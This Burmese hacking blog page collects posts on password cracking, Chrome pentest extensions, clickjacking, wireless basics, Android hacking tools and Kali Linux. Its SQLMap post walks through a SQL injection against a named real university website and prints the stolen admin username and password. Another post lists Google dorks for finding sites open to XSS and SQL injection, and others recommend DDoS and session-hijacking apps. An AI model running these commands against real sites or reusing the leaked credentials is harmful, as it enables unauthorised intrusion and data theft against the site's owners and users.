Facebook Account တစ်ခု ကို Crack လုပ်ဖို့ ဖြစ်နိုင်ပါ့မလား ?


ဒီတစ်ခါ Facebook Account တစ်ခုကို Crack လုပ်ဖို့ ဖြစ်နိုင်မလား မဖြစ်နိုင်ဘူးလား ဆိုတာကို လေ့လာကြည့်ကြရအောင်။

အရင်ဆုံး Hacking A Facebook Account နဲ့  Cracking A Facebook Account ဆိုတာ မတူညီတဲ့ term နှစ်ခု ဖြစ်တယ်ဆိုတာကို သိထားဖို့ လိုအပ်ပါတယ်။

Hacking A Facebook Account ဆိုတာက foolproof methods တွေဖြစ်တဲ့ Phishing တို့  Keylogger တို့ စသည့် နည်းလမ်းပေါင်းစုံ ဖြင့် account တစ်ခုကို ရယူခြင်းဖြစ်ပါတယ်.... ( မှတ်ချက် ။ ။ အခြား methods တွေအများကြီး ရှိပါသေးတယ် )

Cracking A Facebook Account ဆိုတာကတော့ Bruteforce Attack တို့  Dictionary Attack တို့ ဖြင့် password ကို crack လုပ်ပြီ account တစ်ခုကို ရယူခြင်းဖြစ်တယ်လို့  အကြမ်းဖျင်းအားဖြင့် ဆိုနိုင်ပါတယ်။

Bruteforce Attack

Bruteforce Attack ဆိုတာကတော့ အခြေခံအကျဆုံး cracking method တစ်ခုဖြစ်ပါတယ်။ Bruteforce Attack ဟာ ဖြစ်နိုင်ခြေရှိတဲ့ password combination တွေကို correct password ရသည်အထိ  တိုက်ဆိုင် စစ်ဆေးပေးတဲ့ method ဖြစ်ပါတယ်။  ဒါပေမယ့် password က ရှုပ်ထွေးလေလေ correct password ရဖို့  အချိန်ပို ကြာလေလေ ပါပဲ။

အဲ့ဒါနဲ့ ပတ်သတ်လို့  အောက်က table လေးကို ကြည့်ကြည့်ပါ။

Dictionary Attack

Bruteforce Attack နဲ့  Dictionary Attack တို့ မှာ ကွာခြားချက်က တစ်ခုတည်းရှိပါတယ်။ အဲ့ဒါကတော့ Dictionary Attack မှာ မိမိစိတ်ကြိုက် try ချင်တဲ့ password ကို try လုပ်နိုင်တဲ့ အချက်ပါပဲ။ နားရှုပ်သွားလားမသိဘူး :D
Dictionary Attack မှာ wordlist ကို လွတ်လွတ်လပ်လပ် စိတ်ကြိုက်ရွေးခြယ်ပိုင်ခွင့်ရှိပါတယ်။

အောက်မှာဖော်ပြထားတဲ့ Video Tutorial ကို ကြည့်ခြင်းဖြင့် Dictionary Attack ကို ပိုမို သဘောပေါက်လိမ့်မယ်လို့ ထင်ပါတယ်။
 

ကဲ .. ဒါဆို Facebook Account တစ်ခုကို Crack လုပ်ဖို့ ဖြစ်နိုင်ပါ့မလား ?

Facebook နဲ့ တခြား social site တွေအားလုံး နီးပါးက unsuccessful login attempts လို့ ခေါ်တဲ့ မအောင်မြင်တဲ့ login attempts တွေ အကြိမ်အနည်းငယ်လောက် try ပြီးသွားတဲ့ အခါမှာ အဲ့ဒီ account ကို lock ချလေ့ရှိပါတယ်။ အဲ့ဒီလို အချိန်မျိုးမှာ "Account Lockout Feature" သို့ မဟုတ် "Account Lockout feature" ကဲ့သို့ သဘောတရားတူသည့် feature တစ်ခုခုဖြင့် automated password cracking method ကို ကာကွယ်လေ့ရှိပါတယ်။ 

ဒါ့ကြောင့် ကျွန်တော့် အနေနဲ့  Facebook Account တစ်ခုကို Crack လုပ်ဖို့ မဖြစ်နိုင်ဘူးလို့ ဆိုချင်ပါတယ်။



Read more


Install Firefox on Kali Linux


Mozilla Firefox ဟာ Kali Linux မှာပါတဲ့ Default Browser ဖြစ်တဲ့  Iceweasel နဲ့ နှိုင်းယှဉ်ရင် အသုံးပြုရတာ User Friendly ဖြစ်မယ်လို့ ကျနော်ထင်ပါတယ်။ ကျနော်ကိုယ်တိုင်လည်း Iceweasel နဲ့ ယှဉ်ရင် Firefox ကိုအသုံးပြုရတာ ပိုနှစ်သက်ပါတယ်။
ဒါကြောင့် Kali Linux မှာ Mozilla Firefox အသုံးပြုပုံကို share လုပ်ပေးသွားမှာဖြစ်ပါတယ်။

အဓိက အရေးကြီးတာက မူလ Kali မှာပါတဲ့ Iceweasel ကို uninstall လုပ်ရမှာဖြစ်ပါတယ်။ မဟုတ်ရင် သူက Firefox ကို install လုပ်ဖို့ allow ပေးမှာမဟုတ်ဘူးဗျ။

ဒါကြောင့် အရင်ဆုံးအနေနဲ့ 
၁။ terminal ဖွင့်ပြီးတော့  apt-get remove iceweasel
လို့ ရိုက်ထည့်ပေးလိုက်ပါ။ ဒါဆိုရင် Iceweasel ကို remove လုပ်သွားမှာဖြစ်ပါတယ်။

၂။ ပြီးရင် echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null လို့ ရိုက်ထည့်ပြီးတော့ install လုပ်ဖို့ အတွက် repository ကို add လုပ်ရမှာဖြစ်ပါတယ်။

၃။ apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
ဆိုတာကတော့ လိုအပ်တဲ့ gpg key ကို import လုပ်ပေးမှာပါ။

၎။ လိုအပ်တဲ့ package ကို update လုပ်ဖို့ အတွက်ကတော့  apt-get update ဆိုတဲ့ command ကို အသုံးပြုရပါမယ်။

၅။ Mozilla Firefox ကို install လုပ်ဖို့ အတွက်ကတော့ apt-get install firefox-mozilla-build လို့ ရိုက်ထည့်ရပါမယ်။

၆။ အဲ့ဒီ installation ပြီးသွားရင်တော့ terminal ကနေ firefox လို့ ရိုက်ထည့်ပြီး Mozilla Firefox ကို အသုံးပြုနိုင်ပြီဖြစ်ပါတယ်။


Read more


Use Google Chrome For Hacking






Pentesters သို့ မဟုတ် Hacker အများစုဟာ သူတို့ အတွက် အသုံးဝင်တဲ့ plugin တော်တော်များများ အသုံးပြု လို့ ရတဲ့ Mozilla Firefox Browser ကို အသုံးပြုကြတာများပါတယ်။
ဒါက အရင်တုန်းကပါ အခုဆိုရင်တော့ Chrome Browser မှာ Pentesters တွေ အသုံးဝင်တဲ့  extension တွေ တော်တော်များများရှိနေပါပြီ။
အဲ့ဒီ အထဲကမှ အသုံးဝင်မယ် ထင်တာလေးတွေနဲ့ မိတ်ဆက်ပေးချင်ပါတယ်။

XSS Rays


XSS Rays မှာ Scanner, Reverser နဲ့  DOM inspection tool တွေပါဝင်ပါတယ်။

XSS Rays ရဲ့  Official Description ထဲမှာ ရေးထားတာတွေကတော့

Official DescriptionXSS Rays is a security tool to help pen test large web sites. It's core features include a XSS scanner, XSS Reverser and object inspection. Need to know how a certain page filters output? Don't have the source? No problem. XSS Rays will blackbox reverse a XSS filter without needing the source code. 


Websecurify Scanner


Web application attacks တွေတော်တော်များများကို detect လုပ်ပေးနိုင်တဲ့ scanner ဖြစ်ပါတယ်။ ပြီးတော့ fully automated ဖြစ်ပြီး user friendly ဖြစ်ပါတယ်။

အသုံးပြုပုံအဆင့်ဆင့်
- websecurify scanner ကို အောက်က link ကနေ download လုပ်လိုက်ပါ။
https://suite.websecurify.com/foundation 

- Scan ဖတ်ချင်တဲ့ URL ကို ရိုက်ထည့်လိုက်တာနဲ automatic scanning လုပ်သွားမှာဖြစ်ပါတယ်။



HTTP Finder


HTTP Finder ကတော့ Http Parameter Pollution attacks ကို အလွယ်တကူ detect လုပ်နိုင်ပါတယ်။ HTTP Parameter Pollution ဆိုတာ နောက်ဆုံးပေါ် web application attacks တစ်မျိုးပဲဖြစ်ပါတယ်။

HTTP Finder ရဲ့  Official Description ထဲမှာ ရေးထားတာတွေကတော့

HTTP Parameter Pollution (HPP) is a recently discovered web exploitation technique. Please read the NDSS 2010 paper for more details about the technique. HPP Finder is a Chrome extension designed for detecting HPP attempts. HPP Finder can detect URLs and HTML forms that might be susceptible of parameter pollution, but it is not a complete solution against HPP. 







XSS CHEF


XSS CHEF  ဆိုတာ google chrome အတွက် BEEF (Browser Exploitation Framework) ကို အကောင်းဆုံး replacement လုပ်ပေးနိုင်ပြီးတော့ exploitation process တွေကိုလည်း လွယ်ကူစေပါတယ်။



Cookie Editor


Cookie Editor ကလည်း Google Chrome မှာ Hacker တွေအတွက် အလွန် အသုံးဝင်တဲ့ extension တစ်ခုပါပဲ။ အများအားဖြင့် session hijacking attacks အတွက် အသုံးပြုကြပါတယ်။
Session Hijacking နဲ့ ပတ်သတ်လို့ ကျနော် introduction သဘောမျိုးရေးထားတဲ့ ပိုစ့်ရှိပါတယ် မဖတ်ရသေးရင် ဒီမှာ သွားဖတ်နိုင်ပါတယ်။


Read more


Clickjacking ဆိုတာဘာလဲ?

Clickjacking ဆိုတာ Attacker က Victim ကို သူ click လုပ်ခိုင်းချင်တဲ့ hidden လုပ်ထားတဲ့ link သို့ မဟုတ် buttons ကို click လုပ်အောင် cheat လုပ်တာပဲဖြစ်ပါတယ်။ ပုံမှန်အားဖြင့်တော့ hidden link / buttons တွေကို background အရောင်နဲ့ ထပ်တူဖြစ်အောင်ဖန်တီးထားတတ်ကြပါတယ်။
Clickjacking လုပ်နိုင်ဖို့ အတွက်လည်း web browser တွေရဲ့  security ပိုင်းအားနည်းချက်ကရှိနေပါတယ်။ အဲ့ဒါကတော့ web page တွေကို မူလ general view ကနေတဆင့် hidden layer တွေ ကို allow လုပ်ထားလို့ ပါပဲ။
Clickjacking ဆိုတာကို ဥပမာအနေနဲ့  အောက်က hidden layer ကို victim က မမြင်ရပါဘူး အပေါ်က အုပ်ထားတဲ့ layer မှာက download button လိုမျိုး ဒါမှမဟုတ် play button လိုမျိုး တစ်ခုခုကိုပဲ မြင်ရပါမယ်။ တကယ်လို့  victim က အဲ့ဒီ download/play button ကို နှိပ်လိုက်တဲ့အခါမှာ သူတကယ်နှိပ်မိတာက အဲ့ဒီ button တွေအောက်မှာ hidden လုပ်ထားတဲ့ layer မှာရှိတဲ့ Attacker နှိပ်စေချင်တဲ့ button ကို အလိုလို နှိပ်ပြီးသား automatic ဖြစ်သွားပြီဖြစ်ပါတယ်။
အဲ့ဒီလိုနည်းနဲ့  attacker တစ်ယောက်ဟာ victim ကို သူ နှိပ်စေချင်တဲ့ link/button ကို နှိပ်ခိုင်းသွားခြင်းကို Clickjacking လုပ်တယ်လို့ ခေါ်ပါတယ်။






Read more


Basics of Wireless Network

ဒီတစ်ခါတော့ wireless network ရဲ့  security ပိုင်းနဲ့ ပတ်သတ်ပြီး ကျနော် တီးမိခေါက်မိ သလောက်လေး ကို share ပေးတဲ့သဘောပါ။

Wireless Network ဆိုတာဘာလဲ ?

Wireless network ဆိုတာ devices တွေတစ်ခုနဲ့ တစ်ခုကို wire တွေ အသုံးမပြုပဲ တစ်ခုနဲ့ တစ်ခု radio wave ကို အသုံးပြုပြီး interconnection လုပ်တဲ့ network အမျိုးအစားဖြစ်ပါတယ်။
computer ထဲမှာရှိတဲ့ wireless adaptor ကနေပြီးတော့data တွေကို translate လုပ်ပြီး radio signal နဲ့  transmit လုပ်လိုက်ပါတယ်။ အဲ့ဒီ signal ကို wireless router ကနေ receive လုပ်ပြီး decode လုပ်ခြင်းဖြင့် connect လုပ်ပါတယ်။
wireless network ကို အများအားဖြင့် Wifi ဒါမှမဟုတ် WLan လို သုံးနှုံးခေါ်ဝေါ်ကြပါတယ်။
wireless network ရဲ့ အဓိကအားသာချက်ကတော့ user တွေ အနေနဲ့  network ကို connect လုပ်ဖို့ အတွက် plug ထိုးစရာမလိုတာကြောင့် အသုံးပြုရတာ ပိုမို အဆင်ပြေပါတယ်။
သူ့ မှာလဲ အားနည်းချက်ရှိပါတယ်။ အဲ့ဒါကတော့ properly configured မလုပ်ထားရင် security ပိုင်းမှာ wire နဲ့  connect လုပ်တာထက် ပိုပြီး security ပိုင်း အားနည်းပါတယ်။

Basic Terminology

Service Set Identifier (SSID) ဆိုတာ wireless networks ရဲ့  alphanumeric string တွေပါ။ သူက အများဆုံး 32 bit အထိရှိပါတယ်။ channel တစ်ခု သို့ မဟုတ် range တစ်ခုအတွင်းမှာ network တစ်ခုထက်မက ရှိနိုင်ပါတယ်။ SSID ဟာ network တစ်ခုနဲ့ တစ်ခု မတူညီကြပါဘူး။







Wireless Access Point (WAP)


WAP ဆိုတာကတော့ wireless network signals ကို generated လုပ်တဲ့ point ကိုဆိုလိုတာပါ။
WAP ဆိုတာ network ထဲမှာရှိတဲ့ computer ကနေ ထုတ်လွှင့်လိုက်တဲ့ radio signals တွေကို receive လုပ်ပေးပြီး router ကို ပို့ ပေးတဲ့ အလုပ်ကို လုပ်ဆောင်ပါတယ်။


Basic Service Set Identifier (BSSID)

WAP ဒါမှမဟုတ် wireless router ရဲ့  MAC address 48 bit key ဖြစ်ပါတယ်။

Beacons 

Beacons ဆိုတာ network ထဲမှာရှိတဲ့ computers တွေနဲ့ WAP ကြားမှာ connect လုပ်ပေးတဲ့ wireless packet တွေပဲဖြစ်ပါတယ်။

Wireless Equivalent Privacy (WEP) ဆိုတာဘာလဲ ?

WEP ဆိုတာကတော့ wifi data stream တွေကို encrypt လုပ်ထားခြင်းပဲဖြစ်ပါတယ်။ WEP encryption မှာ 64bit သို့ မဟုတ် 128bit key ဖြစ်ပါတယ်။

WEP ရဲ့ အားသာချက်များ

1. Authenticating Clients
users ဒါမှမဟုတ် clients ဟာ network ကို access လုပ်ဖို့ အတွက် မှန်ကန်တဲ့ WEP key ကို ရိုက်ထည့်မှ အသုံးပြုနိုင်မှာဖြစ်ပါတယ်။

2. Privacy 
wireless data တွေကို encrypt လုပ်ခြင်းဖြင့် user က မှန်ကန်တဲ့ WEP key ကို ရိုက်ထည့်တဲ့အခါကျမှ decryption ကို allow လုပ်မှာဖြစ်ပါတယ်။
WEP key ကို အလွယ်တကူ crack လုပ်လို့ ရနိုင်ပါတယ်။ ဘာဖြစ်လို့ လဲဆိုတော့ Initialization Vector (IV) size က 24bit ဆိုတော့ အရမ်းတိုလွန်းတယ်။
ဒါကြောင့်မို့ လို့  Wi-Fi Protected Access(WPA) နဲ့  WPA2 ဆိုတဲ့  security protocols တွေကို ထပ်မံ released လုပ်လာကြပါတယ်။



Read more


SQL Map



SQL Map ကို Python နဲ့  develop လုပ်ထားပြီးတော့ Backtrack 5, Backtrack 5 R1 အပါအ၀င် Backtrack Version အားလုံးမှာ ပါဝင်တဲ့ အကောင်းဆုံး SQL injection tool တစ်ခုပါ။ သူက database တစ်ခုလုံးကို takeover လုပ်လို့ ရတဲ့ powerful tool တစ်ခုလည်းဖြစ်ပါတယ်။



အရင်ဆုံး Vulnerable terget တစ်ခု လိုအပ်ပါတယ် ။
(ကျနော်ကတော့ http://www.hu.edu.pk/viewfaculty.php?id=12 ဆိုတဲ့ Pakistan Site တစ်ခုနဲ့ ဥပမာပေးပြီး ရှင်းပြပေးသွားပါမယ်။)



Backtrack terminal ထဲကို သွားပြီးတော့  cd/pentest/database/sqlmap လို့ ရိုက်ထည့်လိုက်ပါ။



Sqlmap ကို run ဖို့ အတွက် သုံးရမယ့် command တွေကတော့

(-u ဆိုတာက vulnerable url)

သို့ မဟုတ်
 ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
တကယ်လို့  --dbs လို့ အသုံးပြုရင်တော့ server ထဲမှာ ရှိတဲ့ database အားလုံးကို fetch လုပ်မှာဖြစ်ပြီး
-- current-db ဆိုရင်တော့ current website နဲ့  related ဖြစ်တဲ့ database ကိုပဲ fetch လုပ်မှာဖြစ်ပါတယ်။ ဒါဆိုရင် database name ကို ရမှာဖြစ်ပါတယ်။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables
ဒီမှာ -D ဆိုတာကတော့ database name နဲ့  - tables ဆိုတာကတော့ current database ထဲမှာ ရှိတဲ့ tables တွေကို fetch လုပ်ဖို့ ဖြစ်ပြီးတော့ table name ကို ရမှာဖြစ်ပါတယ်။
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
ဒါကတော့ table ထဲမှာ ရှိတဲ့ columns name တွေကို ရယူဖို့ အတွက်ဖြစ်ပြီး

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name –dump
ဒါဆိုရင်တော့ "admin" ဆိုတဲ့ table ထဲမှာရှိတဲ့ information အားလုံးကို ရပြီဆိုရင်တော့ process အားလုံးပြီးပြီဗျ။

Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123

Read more


Best Android Hacking Tools

လူတော်တော်များများ သိထားကြတာက hacking တို့  pentesting တို့ ကို computer ကနေပဲလုပ်လို့ ရတယ်လို့ ထင်နေကြတယ်ဗျ။ တကယ်တန်းတော့
Android ဖုန်းတွေနဲ့ လည်း pentesting လုပ်လို့ ရပါတယ်။ အဲ့လို attacking လုပ်နိုင်ဖို့ အတွက် အသုံးပြုတဲ့ android hacking tools တွေ အများကြီး ရှိပါတယ်။ အဲ့ဒီအထဲကမှ တကယ်အသုံးဝင်တဲ့ tools အချို့ ကို ဖော်ပြပေးသွားမှာဖြစ်ပါတယ်။

Android Network Toolkit:
Android Network Toolkit:

Android Network Toolkit


နောက်ဆုံးပြုလုပ်ခဲ့တဲ့ Defcon Conference မှာ စတင်ပြီး release လုပ်ခဲ့တာဖြစ်ပါတယ်။ ဒီ toolkit ကို အသုံးပြုခြင်းဖြင့် penetration tester တွေ Ethical Hackers တွေ အနေနဲ့  mobile device တွေ အသုံးပြုပြီးတော့ vulnerable  network တွေကို ရှာဖွေဖို့ အသုံးပြုနိုင်ပါတယ်။ ဒီ application ကို ထုတ်လုပ်တဲ့ company ရဲ့ နောက်ကွယ်မှာ Israel Security Firm တစ်ခုဖြစ်တဲ့ Zimperium ပါဝင်နေတယ်လို့ သိရပါတယ်။

Download Android Network Toolkit

Nmap for Android


Nmap (Network Mapper) ဟာ Network Scanner (Port Finder)Tools  တွေထဲမှာ အကောင်းတကာ့အကောင်းဆုံး tool တစ်ခုပဲဖြစ်ပါတယ်။ Nmap ဟာ Unix OS အတွက် အဓိကထားပြီး ထုတ်လုပ်ခဲ့သော်လည်း အခုဆိုရင်တော့ Windows OS အတွက်သာမက Android OS အတွက်ပါ ထုတ်လုပ်လာခဲ့ပါတယ်။ Nmap ကို အသုံးပြုပြီး scan လုပ်လို့ ပြီးတာနဲ့ scan result ကို email ကတဆင့် လက်ခံရရှိမှာဖြစ်ပါတယ်။

Download Nmap for Android

FaceNiff 2.4 - Session Hijacker for Android


FaceNiff ကတော့ Social Networking Site တွေဖြစ်တဲ့ Facebook တို့ Twitter တို့ ကို session hijacking လုပ်ဖို့ အတွက်ရည်ရွယ်ပါတယ်။

(Note: ကျနော် ကိုယ်တိုင် တစ်ခါမှ အသုံးမပြုဖူးပါ။)

Download FaceNiff 2.4

AnDOSid - Ddos tool for Android


Ddos Attack ဟာ အရမ်းကြောက်ဖို့ ကောင်းပါတယ် ဘာဖြစ်လို့ လဲဆိုတော့ အဲ့ဒီ attack ဟာ hacking ပိုင်းမှာ သိပ်ကျွမ်းကျင်စရာမလိုဘူး တကယ်တိုက်ရင် တကယ်ထိရောက်ပြီး Server တစ်ခု Down သွားနိုင်ပါတယ်။ AnDOSid ဆိုတဲ့ tool ကတော့ ကျနော်သုံးဖူးသမျှထဲမှာ Android Device တွေအတွက် အကောင်းဆုံး Ddos tool ပဲဖြစ်ပါတယ်။

Download AnDOSid

SSHDroid - Android Secure Shell


Secure Shell လို့ ခေါ်တဲ့ SSH အသုံးပြုခြင်းဖြင့် သင့် Device ကို PC နဲ့ connect လုပ်တဲ့ အခါမှာ execute command တွေဖြစ်တဲ့ terminal တို့  adb shell တို့ ကို အသုံးပြုနိုင်မှာဖြစ်ပါတယ်။

Download SSHDroid



Defcon conference
Defcon conference
Defcon conference
Defcon conference
Android Network Toolkit:

Read more


How to find vulnerable website for XSS | SQLI | LFI | RFI

Attacker တော်တော်များများကတော့ Google Search ကို အသုံးပြုပြီးတော့ vulnerable ဖြစ်နေတဲ့ website ကို ရှာဖွေကြပါတယ်။ တစ်ချို့ တွေကတော့ရကြပြီး တစ်ချို့ ကတော့ မအောင်မြင်ပါဘူး။
Website တစ်ခု vulnerable ဖြစ်မဖြစ်ကို စစ်ဖို့ ဆိုတာကတော့ Newbie တွေအတွက်တော့ အခက်အခဲဖြစ်နေမှာပါ။ ဒါဆိုရင် Google Dorks တွေသုံးပြီးတော့ vulnerable site ကိုရှာဖွေတာ အကောင်းဆုံးနည်းလမ်းပါပဲ။

vulnerable site ကို ရှာဖွေဖို့  Dorks တွေ အများကြီးရှိပါတယ်။ ဒီနေရာမှာစဉ်းစား စရာ တစ်ချက်က ဒီ Dorks တွေကို လူတော်တော်များများက အသုံးပြုပြီး attack လုပ်သွားပြီးပြီ ဆိုတာကို မေ့ထားလို့ မရပါဘူး။
ဒါ့ကြောင့် ဦးနှောက် နည်းနည်း သုံးပြီး အခြား technique တွေကိုလည်း စဉ်းစားအသုံးချရပါမယ်။

ကျနော်သည် Attacker တစ်ယောက်မဟုတ်ပါဘူး။ ဒါပေမယ့် ကျနော် သိသလောက် Dorks တွေကို ဖော်ပြပေးသွားမှာဖြစ်ပါတယ်။ ဒီထက်ကောင်းပြီး ပိုမိုလွယ်ကူတဲ့ Dorks တွေလည်း ရှိကောင်းရှိမှာပါ။


Dorks for Cross Site Scripting XSS


inurl:".php?search="

inurl:".php?searchstring="

inurl:search.php?q=

inurl:com_feedpostold/feedpost.php?url=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

Dorks for SQL Injection (SQLI)


inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()

How to check Sub-Domain


Sub-domain ကို ရှာဖွေဖို့ အတွက် အကောင်းဆုံး Dorks တွေကတော့

Site: URL -inurl:www

ဆိုတာကို သုံးသင့်ပါတယ်။ ဥပမာ google ရဲ့ Sub-domain ကိုရှာချင်တယ်ဆိုရင်တော့
Site: google.com -inurl:www
လို့ အသုံးပြုရပါမယ်။

inurl:".php?search="

inurl:".php?searchstring="

inurl:search.php?q=


inurl:com_feedpostold/feedpost.php?url=


inurl:/poll/default.asp?catid=

 

inurl:/search_results.php?search=
 
inurl:scrapbook.php?id=
 

inurl:headersearch.php?sid= - See more at: http://mybasictipsntricks.blogspot.com/2013/04/how-to-find-vulnerable-website-for-xss.html#sthash.23NCn8yV.dpuf
Check website for Cross site scripting XSS:
newbieNe
vulnerable website
vulnerable website
vulnerable website

Read more


Kali Linux 1.0.4



ဒီတစ်ခါထွက်ရှိလာတဲ့ Kali Linux 1.0.4 မှာတော့အရင် version အဟောင်းနဲ့ ကြည့်ရင်တော်တော် လေး ပြောင်းလဲထားတာတွေ့ ရပါတယ်။

သူ့ မှာ ထပ်ဖြည့်ထားတဲ့ additional tools တွေကတော့

ဒါအပြင် package တွေတော်တော်များများလဲ upgrade လုပ်ထားပါသေးတယ်။

အဲ့ထဲက upgrade လုပ်ထားတဲ့ package အချို့ ကတော့
 
ထုံးစံအတိုင်းပဲ တကယ်လို့ သင်ဟာ Kali linux version အဟောင်းကို တင်ထားပြီးသားဆိုရင်တော့ Kali Linux 1.0.4 ထပ်ပြီး download ဆွဲစရာမလိုပါဘူး  
Terminal ထဲကနေပဲ “apt-get update && apt-get dist-upgrade” ဆိုတဲ့ command ကို အသုံးပြုပြီး latest version ကို ရယူနိုင်ပါတယ်။
 
For more info on Kali Linux visit Official blog by Click Here or Download ISO Image from Download page.

Read more

Powered by Blogger.

About This Blog

Blogger Tips And Tricks|Latest Tips For Bloggers Free Backlinks

Respect List

Blink Hacker Group

Myanmar Hacker Uniteam

Brotherhood of Myanmar Hackers

and All Myanmar Attackers & All Myanmar Black Hats.

Popular Posts

Followers

စည်းလုံးခြင်းသံစဉ်ရေဒီယို

Web hosting for webmasters